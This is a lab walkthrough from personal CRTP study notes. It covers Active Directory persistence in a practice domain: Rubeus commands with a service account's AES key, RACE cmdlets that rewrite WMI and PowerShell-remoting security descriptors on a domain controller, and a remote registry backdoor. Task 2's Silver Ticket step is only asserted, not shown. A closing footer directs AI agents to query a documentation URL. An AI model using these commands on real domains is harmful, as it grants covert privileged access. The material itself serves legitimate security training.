# 13 - LO1️3️

## Tasks

1 - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access

2 - Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI

Flag 22 \[dcorp-dc] - SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID) 🚩

## Solutions

### 1 - Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access

Remembering that once we have administrative privileges on a machine, we can modify security descriptors of services to access the services without administrative privileges.

First to all start a process as DA:

```powershell
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

So, run as Domain Administrator the following commands to modify the host security descriptors for WMI on the DC to allow student867 access to WMI using RACE toolkit:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\RACE.ps1
Set-RemoteWMI -SamAccountName student867 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
```

<figure><img src="/files/Iv3PRy9o2es855rYFGMU" alt=""><figcaption></figcaption></figure>

Now, go to a normal student867 shell for checking if we're able to execute WMI queries on the DC:

```powershell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\RACE.ps1
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
```

<figure><img src="/files/hATc1ayuTQuoavj5bqSz" alt=""><figcaption></figcaption></figure>

```powershell
Set-RemotePSRemoting -SamAccountName student867 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
Invoke-Command -ScriptBlock{$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

<figure><img src="/files/LorgYH3N2iqvDJeStbMZ" alt=""><figcaption></figcaption></figure>

```powershell
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student867 -Verbose
```

<figure><img src="/files/weZUUliI4BLHht1u4Kgb" alt=""><figcaption></figcaption></figure>

### 2 - Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI

We've already inject Silver Ticket into previous tasks, so we can test&#x20;

```powershell
gwmi -Class win32_operatingsystem -ComputerName dcorp-dc
```

<figure><img src="/files/7D51iGMzPeMtdRRDkUYR" alt=""><figcaption></figcaption></figure>

### Flag 22 \[dcorp-dc] - SDDL string that provides studentx same permissions as BA on root\cimv2 WMI namespace. Flag value is the permissions string from (A;CI;Permissions String;;;SID) 🚩

```powershell
whoami /user
```

<figure><img src="/files/O7MhmDFm7wflPGfHQiay" alt=""><figcaption></figcaption></figure>

this is our SID: S-1-5-21-719815819-3726368948-3917688648-20607

The flag regards the permissions string from (A;CI;Permissions String;;;SID): `CCDCLXXXXXXXXXXX`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/crtp-notes/readme/lab/13-lo1-3.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.